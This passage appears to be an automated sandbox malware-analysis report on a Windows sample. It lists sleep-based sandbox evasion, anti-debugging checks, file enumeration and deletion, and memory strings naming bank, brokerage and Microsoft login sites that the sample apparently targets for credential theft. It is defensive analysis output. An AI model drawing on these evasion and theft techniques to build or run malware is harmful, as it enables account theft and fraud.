                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe TID: 948Thread sleep time: -35000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe TID: 3820Thread sleep count: 2277 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe TID: 3820Thread sleep time: -4554000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe TID: 3820Thread sleep count: 7697 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe TID: 3820Thread sleep time: -15394000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0049445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0049445A
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0049C6D1 FindFirstFileW,FindClose,0_2_0049C6D1
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0049C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0049C75C
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0049EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0049EF95
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0049F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0049F0F2
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0049F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0049F3F3
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004937EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004937EF
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00493B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00493B12
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0049BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0049BCBC
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_0061C400 FindFirstFileW,FindNextFileW,FindClose,6_2_0061C400
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004349A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004349A0
                Source: -0-5538O2.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: -0-5538O2.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: -0-5538O2.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: -0-5538O2.6.drBinary or memory string: discord.comVMware20,11696487552f
                Source: -0-5538O2.6.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: -0-5538O2.6.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: -0-5538O2.6.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3361688782.0000000000733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll'
                Source: -0-5538O2.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: -0-5538O2.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: -0-5538O2.6.drBinary or memory string: global block list test formVMware20,11696487552
                Source: -0-5538O2.6.drBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.0000000007A08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .comVMware20,11696487552t
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.0000000007A08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,11696487552t
                Source: -0-5538O2.6.drBinary or memory string: AMC password management pageVMware20,11696487552
                Source: -0-5538O2.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: -0-5538O2.6.drBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: firefox.exe, 00000008.00000002.2924069117.000001E91FADD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAA
                Source: -0-5538O2.6.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.0000000007A08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,116964875owk
                Source: -0-5538O2.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: -0-5538O2.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.0000000007A08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ve Brokers - HKVMware20,11696487552]
                Source: -0-5538O2.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: -0-5538O2.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: -0-5538O2.6.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: -0-5538O2.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: -0-5538O2.6.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: -0-5538O2.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.0000000007A08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CDYNVMware20,11696487552p
                Source: -0-5538O2.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: -0-5538O2.6.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.0000000007A08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,1}vU
                Source: -0-5538O2.6.drBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.0000000007A08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: active Brokers - EU WestVMware20,11696487552n
                Source: -0-5538O2.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: -0-5538O2.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: -0-5538O2.6.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.0000000007A08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.0000000007A08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hdfcbank.comVMware20,11696487552
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.0000000007A08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,1
                Source: -0-5538O2.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: XNNdkVYUhBbatb.exe, 00000005.00000002.3364873661.0000000000E0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllB
                Source: -0-5538O2.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeAPI call chain: ExitProcess graph end nodegraph_0-100840
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E rdtsc 2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004175C3 LdrLoadDll,2_2_004175C3
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004A3F09 BlockInput,0_2_004A3F09
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00433B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00433B3A
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00465A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00465A7C
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00434B37 LoadLibraryA,GetProcAddress,0_2_00434B37
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_01F934F0 mov eax, dword ptr fs:[00000030h]0_2_01F934F0
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_01F93490 mov eax, dword ptr fs:[00000030h]0_2_01F93490
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_01F91E70 mov eax, dword ptr fs:[00000030h]0_2_01F91E70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D437C mov eax, dword ptr fs:[00000030h]2_2_037D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov ecx, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA352 mov eax, dword ptr fs:[00000030h]2_2_037FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D8350 mov ecx, dword ptr fs:[00000030h]2_2_037D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C310 mov ecx, dword ptr fs:[00000030h]2_2_0372C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750310 mov ecx, dword ptr fs:[00000030h]2_2_03750310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037663FF mov eax, dword ptr fs:[00000030h]2_2_037663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov eax, dword ptr fs:[00000030h]2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov ecx, dword ptr fs:[00000030h]2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov eax, dword ptr fs:[00000030h]2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov eax, dword ptr fs:[00000030h]2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov ecx, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]2_2_037D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]2_2_037D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC3CD mov eax, dword ptr fs:[00000030h]2_2_037EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B63C0 mov eax, dword ptr fs:[00000030h]2_2_037B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380634F mov eax, dword ptr fs:[00000030h]2_2_0380634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]2_2_0375438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]2_2_0375438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372826B mov eax, dword ptr fs:[00000030h]2_2_0372826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A250 mov eax, dword ptr fs:[00000030h]2_2_0372A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736259 mov eax, dword ptr fs:[00000030h]2_2_03736259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA250 mov eax, dword ptr fs:[00000030h]2_2_037EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA250 mov eax, dword ptr fs:[00000030h]2_2_037EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B8243 mov eax, dword ptr fs:[00000030h]2_2_037B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B8243 mov ecx, dword ptr fs:[00000030h]2_2_037B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372823B mov eax, dword ptr fs:[00000030h]2_2_0372823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038062D6 mov eax, dword ptr fs:[00000030h]2_2_038062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov ecx, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380625D mov eax, dword ptr fs:[00000030h]2_2_0380625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]2_2_0376E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]2_2_0376E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C156 mov eax, dword ptr fs:[00000030h]2_2_0372C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C8158 mov eax, dword ptr fs:[00000030h]2_2_037C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]2_2_03736154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]2_2_03736154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov ecx, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760124 mov eax, dword ptr fs:[00000030h]2_2_03760124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov ecx, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038061E5 mov eax, dword ptr fs:[00000030h]2_2_038061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F0115 mov eax, dword ptr fs:[00000030h]2_2_037F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037601F8 mov eax, dword ptr fs:[00000030h]2_2_037601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
